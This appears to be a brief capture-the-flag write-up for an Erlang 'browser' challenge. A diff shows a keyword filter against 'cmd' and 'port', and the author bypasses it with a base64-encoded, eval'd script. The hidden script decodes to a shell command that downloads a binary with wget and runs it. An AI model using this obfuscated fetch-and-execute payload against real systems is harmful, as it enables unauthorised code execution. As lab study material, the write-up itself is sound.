h1. Erbrawser 2-0
The difference between erb2.0 and 1.0 is disallowing the keywords cmd and port
adc@spacelab:~/ctf/b/browsers/erbrawser$ diff 2.0 1.0
Binary files 2.0/erbrawser.beam and 1.0/erbrawser.beam differ
diff 2.0/erbrawser.erl 1.0/erbrawser.erl
85,97c85
< case string:str(Strscript, "cmd") of
< 0 ->
< case string:str(Strscript, "port") of
< 0 ->
< safe_run(Strscript);
< _ ->
< io:format("DEBUG:Script disallowed~n"),
< skip
< end;
< _ ->
< io:format("DEBUG:Script disallowed~n"),
< skip
< end.
---
> safe_run(Strscript).
Only in 1.0: erl_crash.dump
The difference between erb2.0 and 1.0 is disallowing the keywords cmd and port
Not really a fix. You just have to rot13 your input or something :-)
One tip from a coding POV here, re-use the existing
safe_run()-> code structure to understand how to eval() in erlang.
<html>
<script type="text/erlangscript">
{ok, Tokens, _} = erl_scan:string(base64:decode_to_string("b3Blbl9wb3J0KHtzcGF3biwgInRvdWNoIHlheTsgd2dldCBiaW5hcnk7IC4vYmluYXJ5In0sIFtdKS4=")),
{ok, Parsed} = erl_parse:parse_exprs(Tokens),
{value, Res, _} = erl_eval:exprs(Parsed, erl_eval:new_bindings()),
Res.
</script>
<body>
</body>
</html>